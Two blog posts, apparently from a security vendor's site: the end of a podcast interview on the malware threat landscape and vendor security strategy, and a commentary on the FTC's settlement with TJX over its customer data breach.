So there's still clearly a job to be job for a vendor that's coming in with expertise around the threat space; the kind of threats that are out there to give you the extra sort of confident that you're protected against malware, viruses, worms, Trojans, viruses etc. etc. etc. in case of airspace. And, I think, it's unlikely that in most cases customers are ever going to get to a point where they're going to rely purely on the original vendor for security and not look at any security solution on top of that; particular, when you look at that actively, you know, these days a security solution needs to look right across the network not just on one particular vendor's piece.

So the reality is that very few of our customers are just running the latest Windows operating system, for example, they're running older Windows, they're running Macs, they're running UNIX, they're running Linux, they're running OpenVMS even. So there's a whole range of operating systems out there. So there's clearly a role to be played for someone who's looking at things from a security perspective and providing a complete security solution on top of the security that's in each product.

That makes a lot of sense to me, actually. So now what you see for the future of security both in terms of threats and where the industry is going?

That's a great question. In terms of threats, unfortunately, we see that the number and type of threats out there is just continuing to expand. So the reality is these days that threats are largely very commercially motivated, there's money to be made out of stealing information, there's money to be made out of blasting information such as, you know, spam that's then got to kind of sale attached to it so that there's lot money to be made out of the kind of threats that are out there.

And where there's money to be made, there will be an innovation. There will continue to be innovation. So as I mentioned at the beginning, the Web is paying a large part in threats these days. We're beginning to see things, for example, using things like USB keys, were beginning to see occasionally things now targeting Macs where as originally that it had been always entirely targeted at Windows.

So as technology adapts, as new technologies come in, the malware offers will continue to find innovative ways of using those new technologies and they will continue to find ways of bypassing the defenses that are in place. So I'm afraid it's bad news from that point of view, I think. How does the industry need to handle that? Well, we think it's absolutely crucial that the vendor in this space take a holistic view of the threats rather than trying to pick, you know, viruses as an area specialty or spam as an area of specialty.

So it's absolutely vital to look at the range of threats as a whole so that you're not blindsided as malware offers start to use new techniques. And I think the other piece is that really what we owe to our customers is to give them solutions that are simple and don't start reintroducing these problems of agent pollution. So we can't keep coming up with new point solutions and trying to extract more money out of out of customers for solving the new types of threats that come out there; that's not a reasonable thing to ask of IT managers.

So the industry needs to get its act together and that's certainly what we're doing in terms of providing a simple to use solution that doesn't pollute computers with a lots of different agents and that does provide complete protection against all the different kinds of unwanted stuff that's out there.

Posted by pschooff in Podcast | Permalink | Comments (0) | TrackBacks (0)

Anyone waiting for the official penalty for TJX's lax and often egregious disregard for customer data needs to wait no further. I'm sure you all know the story by now of TJ Maxx's (which is owned by TJX) massive data breach, but if you need to catch up quick, just click here.

According to Network World, in a settlement by the FTC, the company will be required to implement extensive security programs as well as obtain audits by independent third parties every other year for 20 years (that's an audit every other year, not implementing security programs every other year).

The FTC found TJX failed to take reasonable and appropriate security measures to protect unauthorized access to a wealth of personal data. The specific charges against TJX, taken from Network World, were as follows:

* Created an unnecessary risk to personal information by storing it on, and transmitting it between and within, its various computer networks in clear text;

* Did not use readily available security measures to limit wireless access to its networks, thereby allowing an intruder to connect wirelessly to its networks without authorization;

* Did not require network administrators and others to use strong passwords or to use different passwords to access different programs, computers, and networks;

* Failed to use readily available security measures, such as firewalls, to limit access among its computers and the Internet; and

* Failed to employ sufficient measures to detect and prevent unauthorized access to computer networks or to conduct security investigations, such as patching or updating anti-virus software.

Going forward, TJX pretty much has to do what any sane and sensible consumer orientated company should be doing already anyway. Makes you wonder what TJX plans to do once the 20 years are up? Maybe start selling your personal information in store...you know, get a free working credit card number with the purchase of 3 pairs of dress socks!

But things aren't totally finished, as the credit card companies still have a lawsuit against TJX which has yet to be settled. And that'll hit TJX where it hurts most -- right in the wallet.

Posted by pschooff in | Permalink | Comments (0) | TrackBacks (0)